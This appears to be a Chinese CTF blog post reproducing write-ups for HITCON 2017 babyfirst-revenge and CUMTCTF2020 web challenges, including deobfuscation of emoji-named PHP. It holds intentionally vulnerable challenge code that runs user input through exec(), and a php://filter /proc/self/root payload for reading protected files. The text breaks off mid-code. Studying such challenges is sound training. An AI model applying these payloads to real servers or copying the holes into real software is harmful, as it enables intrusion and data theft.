<!DOCTYPE html>


<html lang="en">


<head>
  <meta charset="utf-8" />
   
  <meta name="keywords" content="CTF" />
   
  <meta name="description" content="CTFer,CUMT" />
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
  <title>
    复现wp |  pz1o
  </title>
  <meta name="generator" content="hexo-theme-ayer">
  
  
<link rel="stylesheet" href="/dist/main.css">

  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/gh/Shen-Yu/cdn/css/remixicon.min.css">

  
<link rel="stylesheet" href="/css/custom.css">

  
  
<script src="https://cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

  
  

  

<link rel="alternate" href="/atom.xml" title="pz1o" type="application/atom+xml">
</head>

</html>

<body>
  <div id="app">
    
      <canvas class="fireworks"></canvas>
      <style>
        .fireworks {
          position: fixed;
          left: 0;
          top: 0;
          z-index: 99999;
          pointer-events: none;
        }
      </style>
      
      
    <main class="content on">
      <section class="outer">
  <article
  id="post-复现wp"
  class="article article-type-post"
  itemscope
  itemprop="blogPost"
  data-scroll-reveal
>
  <div class="article-inner">
    
    <header class="article-header">
       
<h1 class="article-title sea-center" style="border-left:0" itemprop="name">
  复现wp
</h1>
 

    </header>
     
    <div class="article-meta">
      <a href="/2099/09/28/%E5%A4%8D%E7%8E%B0wp/" class="article-date">
  <time datetime="2099-09-28T02:18:17.000Z" itemprop="datePublished">2099-09-28</time>
</a> 
  <div class="article-category">
    <a class="article-category-link" href="/categories/CTF/">CTF</a>
  </div>
  
<div class="word_count">
    <span class="post-time">
        <span class="post-meta-item-icon">
            <i class="ri-quill-pen-line"></i>
            <span class="post-meta-item-text"> Word count:</span>
            <span class="post-count">2.1k</span>
        </span>
    </span>

    <span class="post-time">
        &nbsp; | &nbsp;
        <span class="post-meta-item-icon">
            <i class="ri-book-open-line"></i>
            <span class="post-meta-item-text"> Reading time≈</span>
            <span class="post-count">10 min</span>
        </span>
    </span>
</div>
 
    </div>
      
    <div class="tocbot"></div>




  
    <div class="article-entry" itemprop="articleBody">
       
  <a id="more"></a>
<h2 id="Hitcon2017-babyfirst-reveng"><a href="#Hitcon2017-babyfirst-reveng" class="headerlink" title="Hitcon2017 babyfirst-reveng"></a>Hitcon2017 babyfirst-reveng</h2><p>github复现地址</p>
<p><a href="https://github.com/t3hp0rP/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge" target="_blank" rel="noopener">https://github.com/t3hp0rP/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge</a></p>
<h3 id="考点"><a href="#考点" class="headerlink" title="考点"></a>考点</h3><p>命令执行构造反弹shell</p>
<p>源码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    $sandbox = <span class="string">'/www/sandbox/'</span> . md5(<span class="string">"orange"</span> . $_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line">    @mkdir($sandbox);</span><br><span class="line">    @chdir($sandbox);</span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'cmd'</span>]) &amp;&amp; strlen($_GET[<span class="string">'cmd'</span>]) &lt;= <span class="number">5</span>) &#123;</span><br><span class="line">        @exec($_GET[<span class="string">'cmd'</span>]);</span><br><span class="line">    &#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'reset'</span>])) &#123;</span><br><span class="line">        @exec(<span class="string">'/bin/rm -rf '</span> . $sandbox);</span><br><span class="line">    &#125;</span><br><span class="line">    highlight_file(<span class="keyword">__FILE__</span>);</span><br></pre></td></tr></table></figure>
<p>先说几个知识点：</p>
<blockquote>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">&gt;e\</span><br><span class="line">&gt;cho\</span><br><span class="line">&#39;123&#39;</span><br><span class="line">&gt;123</span><br></pre></td></tr></table></figure>
<p>在linux中换行可以执行间断的命令</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&gt;</span><span class="bash">root@kali:~<span class="comment"># vi 1  //在1下写入cat flag.txt</span></span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">root@kali:~<span class="comment"># touch flag.txt</span></span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">root@kali:~<span class="comment"># echo "cumtctf&#123;i_am_so_cute&#125;" &gt;&gt; flag.txt</span></span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">root@kali:~<span class="comment"># cat flag.txt</span></span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">cumtctf&#123;i_am_so_cute&#125;</span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">root@kali:~<span class="comment"># sh 1</span></span></span><br><span class="line"><span class="meta">&gt;</span><span class="bash">cumtctf&#123;i_am_so_cute&#125;</span></span><br></pre></td></tr></table></figure>
<p>在Linux下面可以通过写入一个文件，文件里面的内容是系统命令，然后可以通过<code>sh filename</code>来执行文本里面的系统命令，如果有报错的话会自动跳过</p>
</blockquote>
<h1 id="CUMTCTF2020"><a href="#CUMTCTF2020" class="headerlink" title="CUMTCTF2020"></a>CUMTCTF2020</h1><h1 id="Web"><a href="#Web" class="headerlink" title="Web"></a>Web</h1><h2 id="简单的文件包含？"><a href="#简单的文件包含？" class="headerlink" title="简单的文件包含？"></a>简单的文件包含？</h2><h3 id="考点-1"><a href="#考点-1" class="headerlink" title="考点"></a>考点</h3><p>require_once绕过</p>
<p>源码如下</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">if</span> ($_SERVER[<span class="string">'HTTP_CLIENT_IP'</span>] != <span class="string">'127.0.0.1'</span> &amp;&amp; $_SERVER[<span class="string">'HTTP_X_REAL_IP'</span>] != <span class="string">'127.0.0.1'</span>)&#123;</span><br><span class="line">        <span class="keyword">if</span> ($_SERVER[<span class="string">'HTTP_X_FORWARDED_FOR'</span>] == <span class="string">"127.0.0.1"</span>) &#123;</span><br><span class="line">            <span class="keyword">die</span>(<span class="string">"Do u think that I dont know X-Forwarded-For?&lt;br&gt;Too young too simple sometimes naive"</span>);</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">die</span>(<span class="string">"Sorry, this site is only optimized for those who comes from localhost"</span>);</span><br><span class="line">    &#125;</span><br><span class="line">show_source(<span class="keyword">__FILE__</span>);</span><br><span class="line"><span class="keyword">include_once</span>(<span class="string">"flag.php"</span>);</span><br><span class="line"><span class="keyword">if</span>(<span class="keyword">isset</span>($_POST[<span class="string">'f'</span>])) </span><br><span class="line">  <span class="keyword">include_once</span>($_POST[<span class="string">'f'</span>]);</span><br></pre></td></tr></table></figure>
<p>这里主要问题是<code>reuqire_once</code>的问题</p>
<p><a href="https://www.anquanke.com/post/id/213235#h3-2" target="_blank" rel="noopener">https://www.anquanke.com/post/id/213235#h3-2</a></p>
<p>这里面的源码解析有得还是看不懂，日后再翻</p>
<p>首先说一下php文件包含的机制是将<strong>已经包含的文件与文件的真实路径放进哈希表中</strong>，当已经<code>require_once(&#39;flag.php&#39;)</code>，已经include的文件不可以再<code>require_once</code>。</p>
<p>payload</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">php:&#x2F;&#x2F;filter&#x2F;convert.base64-encode&#x2F;resource&#x3D;&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;proc&#x2F;self&#x2F;root&#x2F;var&#x2F;www&#x2F;html&#x2F;flag.php</span><br></pre></td></tr></table></figure>
<blockquote>
<p>/proc/self指向当前进程的/proc/pid/</p>
<p>/proc/self/root/指向/的符号</p>
<p><img src="/2099/09/28/%E5%A4%8D%E7%8E%B0wp/image-20200928111221260.png" alt></p>
</blockquote>
<h2 id="👍🙌😃"><a href="#👍🙌😃" class="headerlink" title="👍🙌😃"></a>👍🙌😃</h2><h3 id="考点-2"><a href="#考点-2" class="headerlink" title="考点"></a>考点</h3><p>代码格式化、反混淆，bcrypt爆破，<strong>命令执行</strong></p>
<p>这个题 我只能说真的牛逼</p>
<p>真的开眼界 还可以这样</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"><span class="keyword">require</span> <span class="string">'vendor/autoload.php'</span>;</span><br><span class="line"><span class="keyword">use</span> <span class="title">Bcrypt</span>\<span class="title">Bcrypt</span>;</span><br><span class="line">highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">ini_set(<span class="string">"display_errors"</span>,<span class="string">"Off"</span>);</span><br><span class="line">$🙐=<span class="keyword">array</span>(<span class="string">'🙐'</span>,<span class="string">'🙑'</span>,<span class="string">'🙒'</span>,<span class="string">'🙓'</span>,<span class="string">'🙔'</span>,<span class="string">'🙕'</span>,<span class="string">'🙖'</span>,<span class="string">'🙗'</span>,<span class="string">'🙘'</span>,<span class="string">'🙙'</span>,<span class="string">'🙚'</span>,<span class="string">'🙛'</span>,<span class="string">'🙜'</span>,<span class="string">'🙝'</span>,<span class="string">'🙞'</span>,<span class="string">'🙟'</span>);</span><br><span class="line">$🙠=<span class="keyword">array</span>(<span class="string">'🙠'</span>,<span class="string">'🙡'</span>,<span class="string">'🙢'</span>,<span class="string">'🙣'</span>,<span class="string">'🙤'</span>,<span class="string">'🙥'</span>,<span class="string">'🙦'</span>,<span class="string">'🙧'</span>,<span class="string">'🙨'</span>,<span class="string">'🙩'</span>,<span class="string">'🙪'</span>,<span class="string">'🙫'</span>,<span class="string">'🙬'</span>,<span class="string">'🙭'</span>,<span class="string">'🙮'</span>,<span class="string">'🙯'</span>);</span><br><span class="line">$🙰=<span class="keyword">array</span>(<span class="string">'🙰'</span>,<span class="string">'🙱'</span>,<span class="string">'🙲'</span>,<span class="string">'🙳'</span>,<span class="string">'🙴'</span>,<span class="string">'🙵'</span>,<span class="string">'🙶'</span>,<span class="string">'🙷'</span>,<span class="string">'🙸'</span>,<span class="string">'🙹'</span>,<span class="string">'🙺'</span>,<span class="string">'🙻'</span>,<span class="string">'🙼'</span>,<span class="string">'🙽'</span>,<span class="string">'🙾'</span>,<span class="string">'🙿'</span>);</span><br><span class="line">$😀=<span class="keyword">array</span>(<span class="string">'😀'</span>,<span class="string">'😁'</span>,<span class="string">'😂'</span>,<span class="string">'😃'</span>,<span class="string">'😄'</span>,<span class="string">'😅'</span>,<span class="string">'😆'</span>,<span class="string">'😇'</span>,<span class="string">'😈'</span>,<span class="string">'😉'</span>,<span class="string">'😊'</span>,<span class="string">'😋'</span>,<span class="string">'😌'</span>,<span class="string">'😍'</span>,<span class="string">'😎'</span>,<span class="string">'😏'</span>);</span><br><span class="line">$😐=<span class="keyword">array</span>(<span class="string">'😐'</span>,<span class="string">'😑'</span>,<span class="string">'😒'</span>,<span class="string">'😓'</span>,<span class="string">'😔'</span>,<span class="string">'😕'</span>,<span class="string">'😖'</span>,<span class="string">'😗'</span>,<span class="string">'😘'</span>,<span class="string">'😙'</span>,<span class="string">'😚'</span>,<span class="string">'😛'</span>,<span class="string">'😜'</span>,<span class="string">'😝'</span>,<span class="string">'😞'</span>,<span class="string">'😟'</span>);</span><br><span class="line">$😠=<span class="keyword">array</span>(<span class="string">'😠'</span>,<span class="string">'😡'</span>,<span class="string">'😢'</span>,<span class="string">'😣'</span>,<span class="string">'😤'</span>,<span class="string">'😥'</span>,<span class="string">'😦'</span>,<span class="string">'😧'</span>,<span class="string">'😨'</span>,<span class="string">'😩'</span>,<span class="string">'😪'</span>,<span class="string">'😫'</span>,<span class="string">'😬'</span>,<span class="string">'😭'</span>,<span class="string">'😮'</span>,<span class="string">'😯'</span>);</span><br><span class="line">$😰=<span class="keyword">array</span>(<span class="string">'😰'</span>,<span class="string">'😱'</span>,<span class="string">'😲'</span>,<span class="string">'😳'</span>,<span class="string">'😴'</span>,<span class="string">'😵'</span>,<span class="string">'😶'</span>,<span class="string">'😷'</span>,<span class="string">'😸'</span>,<span class="string">'😹'</span>,<span class="string">'😺'</span>,<span class="string">'😻'</span>,<span class="string">'😼'</span>,<span class="string">'😽'</span>,<span class="string">'😾'</span>,<span class="string">'😿'</span>);</span><br><span class="line">$🙀=<span class="keyword">array</span>(<span class="string">'🙀'</span>,<span class="string">'🙁'</span>,<span class="string">'🙂'</span>,<span class="string">'🙃'</span>,<span class="string">'🙄'</span>,<span class="string">'🙅'</span>,<span class="string">'🙆'</span>,<span class="string">'🙇'</span>,<span class="string">'🙈'</span>,<span class="string">'🙉'</span>,<span class="string">'🙊'</span>,<span class="string">'🙋'</span>,<span class="string">'🙌'</span>,<span class="string">'🙍'</span>,<span class="string">'🙎'</span>,<span class="string">'🙏'</span>);</span><br><span class="line">$🏁 = <span class="keyword">array</span>($🙠,$🙠,$🙰,$😀,$😐,$😠,$😰,$🙀);</span><br><span class="line">$😳😃😢🙉😲😗😦🙅 = <span class="string">"strlen"</span>;</span><br><span class="line">$😩😂😸🙉 = <span class="string">"chr"</span>;</span><br><span class="line">$🎁 = <span class="string">"base64_decode"</span>;</span><br><span class="line">$😱😨😞🙊😪😨😡😍 = <span class="string">"isset"</span>;</span><br><span class="line"><span class="function"><span class="keyword">function</span> 😪😗😦😺😲😂😢😼<span class="params">($😳😃😢🙉)</span> </span>&#123;</span><br><span class="line">	<span class="keyword">global</span> $🏁,$😳😃😢🙉😲😗😦🙅,$😩😂😸🙉,$🎁,$😱😨😞🙊😪😨😡😍;</span><br><span class="line">	$😲😗😦🙅= (<span class="string">"$😳😃😢🙉😲😗😦🙅"</span>)($😳😃😢🙉)/<span class="number">4</span>;</span><br><span class="line">	$😳😂😚😼 = <span class="string">""</span>;</span><br><span class="line">	<span class="keyword">for</span> ($😱😧😼🙀 = <span class="number">0</span>;$😱😧😼🙀&lt;$😲😗😦🙅;$😱😧😼🙀++) &#123;</span><br><span class="line">		$😩😂😦🙃 =$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">1</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">2</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">3</span>];</span><br><span class="line">		$😪😾😞😀 =<span class="number">0</span>;</span><br><span class="line">		$😳😂😦😺 =<span class="number">0</span>;</span><br><span class="line">		<span class="keyword">for</span> ($😱😽🙀🙁 =<span class="number">0</span>;$😱😽🙀🙁&lt;<span class="number">8</span>;$😱😽🙀🙁++) &#123;</span><br><span class="line">			<span class="keyword">for</span> ($😱😂🙄🙂=<span class="number">0</span>;$😱😂🙄🙂&lt;<span class="number">16</span>;$😱😂🙄🙂++) &#123;</span><br><span class="line">				<span class="keyword">if</span>($😩😂😦🙃 == $🏁[$😱😽🙀🙁][$😱😂🙄🙂]) &#123;</span><br><span class="line">					$😪😾😞😀=$😱😽🙀🙁;</span><br><span class="line">					$😳😂😦😺 = $😱😂🙄🙂;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		$😲😾😦🙄 = $😪😾😞😀*<span class="number">16</span>+$😳😂😦😺;</span><br><span class="line">		$😳😂😚😼 = $😳😂😚😼.(<span class="string">"$😩😂😸🙉"</span>)($😲😾😦🙄);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">return</span> (<span class="string">"$🎁"</span>)($😳😂😚😼);</span><br><span class="line">&#125;</span><br><span class="line"><span class="function"><span class="keyword">function</span> 😁😁<span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="keyword">global</span> $🏁,$😳😃😢🙉😲😗😦🙅,$😩😂😸🙉,$🎁,$😱😨😞🙊😪😨😡😍;</span><br><span class="line">	$😳😂😖🙅😪😗😚 = 😪😗😦😺😲😂😢😼(😜😃😪😸😳😹😉😃😴😃😳🙆😱😘😢🙄😲😓😉🙊😩😧😅😻😩😽😉😄😜🙇😍😍).😪😗😦😺😲😂😢😼(😲😧😡😁)($_SERVER[😪😗😦😺😲😂😢😼(😥😻😦😞😤😁😢😖😨😀😖😕😢😖😙😍)]);</span><br><span class="line">	😪😗😦😺😲😂😢😼(😲😧🙄😻😱😨😙😍)($😳😂😖🙅😪😗😚);</span><br><span class="line">	😪😗😦😺😲😂😢😼(😩😂😸😻😱😨😙😍)($😳😂😖🙅😪😗😚);</span><br><span class="line">	<span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[😪😗😦😺😲😂😢😼(😩😂😁😻)]) &amp;&amp; ($😳😃😢🙉😲😗😦🙅)($_GET[😪😗😦😺😲😂😢😼(😩😂😁😻)]) &lt;= <span class="number">5</span>) &#123;</span><br><span class="line">		@😪😗😦😺😲😂😢😼(😪😨😸😼😩🙇😍😍)($_GET[😪😗😦😺😲😂😢😼(😩😂😁😻)]);</span><br><span class="line">	&#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[😪😗😦😺😲😂😢😼(😳😽😦🙊😪😨😡😍)])) &#123;</span><br><span class="line">		@😪😗😦😺😲😂😢😼(😪😨😸😼😩🙇😍😍)(😪😗😦😺😲😂😢😼(😳😽😀😷😜😨😚😽😙😑😍😍) . $😳😂😖🙅😪😗😚);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">$🎯 = <span class="keyword">new</span> Bcrypt();</span><br><span class="line">$🔑 = $_POST[😪😗😦😺😲😂😢😼(😳😗😖🙊😳😃😴😻)];</span><br><span class="line">$🔒 = 😪😗😦😺😲😂😢😼(😚😔😚😅😚😔😕🙇😚😖😚😓😪😽😻😄😥😨😒😛😣😼😖😢😲😥🙀😕😞😻😪😅😲😘😦🙉😣😽😦🙈😲😦😑🙅😞😽😞😞😲😺😴😀😪😗😉😜😩😃🙀😝😝😾😩😅😱😖😞😺😪😔😼😆😢😗😿🙊😴😁😸😼);</span><br><span class="line"><span class="keyword">if</span>($🎯-&gt;verify($🔑, $🔒)) &#123;</span><br><span class="line">	<span class="keyword">echo</span>(😪😗😦😺😲😂😢😼(😠😓😉😹😳😺😅😡😩😨😞🙊😴😂😉🙉😪😓😒😂😪😨😚🙀😪😽😼😼😪😓😕😈😜😂😚🙉😠😷😍😍));</span><br><span class="line">	<span class="keyword">echo</span>(😪😗😦😺😲😂😢😼(😦😂😉😃😙😣😖😟😲😃😳🙃😱😗😖😺😱🙉😒🙀😴😓😕😈😜😂😚🙉😠😷😍😍));</span><br><span class="line">	😁😁();</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">	<span class="keyword">echo</span>(😪😗😦😺😲😂😢😼(😠😓😉😹😳😺😅😡😩😨😞🙊😴😂😉🙉😪😓😒🙅😲😃😡😷😲😧😖😀😩😂😷😸😠😓😉😹😳😺😄😍));</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>首先是代码格式化，接着就是<strong>理解代码的执行逻辑，顺便改变代码逻辑</strong></p>
<p>看题解上看的是第一个函数，也就是混淆</p>
<p>为什么要先看第一个函数</p>
<p><img src="/2099/09/28/%E5%A4%8D%E7%8E%B0wp/image-20200929221307190.png" alt="image-20200929221307190"></p>
<p>所以我们就想直接看在不同参数下第一个函数执行输出的结果，所以在第一个函数中添加</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> 😪😗😦😺😲😂😢😼<span class="params">($😳😃😢🙉)</span> </span>&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"加密后："</span>.$😳😃😢🙉;</span><br><span class="line">	<span class="keyword">global</span> $🏁,$😳😃😢🙉😲😗😦🙅,$😩😂😸🙉,$🎁,$😱😨😞🙊😪😨😡😍;</span><br><span class="line">	$😲😗😦🙅= (<span class="string">"$😳😃😢🙉😲😗😦🙅"</span>)($😳😃😢🙉)/<span class="number">4</span>;</span><br><span class="line">	$😳😂😚😼 = <span class="string">""</span>;</span><br><span class="line">	<span class="keyword">for</span> ($😱😧😼🙀 = <span class="number">0</span>;$😱😧😼🙀&lt;$😲😗😦🙅;$😱😧😼🙀++) &#123;</span><br><span class="line">		$😩😂😦🙃 =$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">1</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">2</span>].$😳😃😢🙉[$😱😧😼🙀*<span class="number">4</span>+<span class="number">3</span>];</span><br><span class="line">		$😪😾😞😀 =<span class="number">0</span>;</span><br><span class="line">		$😳😂😦😺 =<span class="number">0</span>;</span><br><span class="line">		<span class="keyword">for</span> ($😱😽🙀🙁 =<span class="number">0</span>;$😱😽🙀🙁&lt;<span class="number">8</span>;$😱😽🙀🙁++) &#123;</span><br><span class="line">			<span class="keyword">for</span> ($😱😂🙄🙂=<span class="number">0</span>;$😱😂🙄🙂&lt;<span class="number">16</span>;$😱😂🙄🙂++) &#123;</span><br><span class="line">				<span class="keyword">if</span>($😩😂😦🙃 == $🏁[$😱😽🙀🙁][$😱😂🙄🙂]) &#123;</span><br><span class="line">					$😪😾😞😀=$😱😽🙀🙁;</span><br><span class="line">					$😳😂😦😺 = $😱😂🙄🙂;</span><br><span class="line">				&#125;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		$😲😾😦🙄 = $😪😾😞😀*<span class="number">16</span>+$😳😂😦😺;</span><br><span class="line">		$😳😂😚😼 = $😳😂😚😼.(<span class="string">"$😩😂😸🙉"</span>)($😲😾😦🙄);</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"原文："</span>.(<span class="string">"$🎁"</span>)($😳😂😚😼);</span><br><span class="line">	<span class="keyword">return</span> (<span class="string">"$🎁"</span>)($😳😂😚😼);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>之后依次修改代码逻辑，替换其中第一个函数输出结果</p>
<p>核心代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">function</span> 😁😁<span class="params">()</span> </span>&#123;</span><br><span class="line">	<span class="keyword">global</span> $🏁,$strlen,$chr,$base64_decode,$isset;</span><br><span class="line">	$path = <span class="string">"/var/www/html/sandbox/"</span>.md5($_SERVER[<span class="string">'REMOTE_ADDR'</span>]);</span><br><span class="line">	mkdir($path);</span><br><span class="line">	chdir($path);</span><br><span class="line">	<span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'cmd'</span>]) &amp;&amp; strlen($_GET[<span class="string">'cmd'</span>]) &lt;= <span class="number">5</span>) &#123;</span><br><span class="line">		@exec($_GET[<span class="string">'cmd'</span>]);</span><br><span class="line">		<span class="comment">//</span></span><br><span class="line">	&#125; <span class="keyword">else</span> <span class="keyword">if</span> (<span class="keyword">isset</span>($_GET[<span class="string">'reset'</span>])) &#123;</span><br><span class="line">		@exec(<span class="string">"rm -rf"</span> . $path);</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">$🎯 = <span class="keyword">new</span> Bcrypt();</span><br><span class="line"></span><br><span class="line">$🔑 = $_POST[<span class="string">"passwd"</span>];</span><br><span class="line">$🔒 = <span class="string">"$2y$10$RBfi8QpJJQQmJD6FylurJeqmP.6cMn7tdoKczL2v9hScd9zDj3wXe"</span>;</span><br><span class="line"><span class="keyword">if</span>($🎯-&gt;verify($passwd, $lock)) &#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"Password verified!"</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"Wow!!Now,hack it!"</span>;</span><br><span class="line">	😁😁();</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;Password not match!&lt;/br&gt;"</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>然后发现有composer包，安装，然后查资料bcrypt</p>
<h3 id="bcrypt"><a href="#bcrypt" class="headerlink" title="bcrypt"></a>bcrypt</h3><p><code>bcrypt</code>是一种哈希算法，可以通过硬件进行扩展（通过可配置的循环次数）。</p>
<p><strong><code>bcrypt</code>是一种单向哈希算法。</strong>如果不知道盐，圆<strong>和密码</strong>（密码），则无法检索纯文本密码。</p>
<blockquote>
<p>加盐：</p>
<p>就是人为的通过一组随机字符与用户原密码的组合形成一个新的字符，从而增加破译的难度。</p>
</blockquote>
<p>在php中，主要有内置的函数<code>password_hash</code>和<code>password_verify</code></p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">$a = password_hash(<span class="string">'password'</span>,PASSWORD_DEFAULT);</span><br><span class="line"><span class="keyword">echo</span> $a.<span class="string">"&lt;br&gt;"</span>;</span><br><span class="line"><span class="keyword">if</span>(password_verify(<span class="string">'password'</span>,$a))&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"success"</span>;</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">else</span>&#123;</span><br><span class="line">    <span class="keyword">echo</span> <span class="string">"failed"</span>;</span><br><span class="line">&#125;</span><br><span class="line">var_dump(password_get_info($a));</span><br><span class="line"></span><br><span class="line"><span 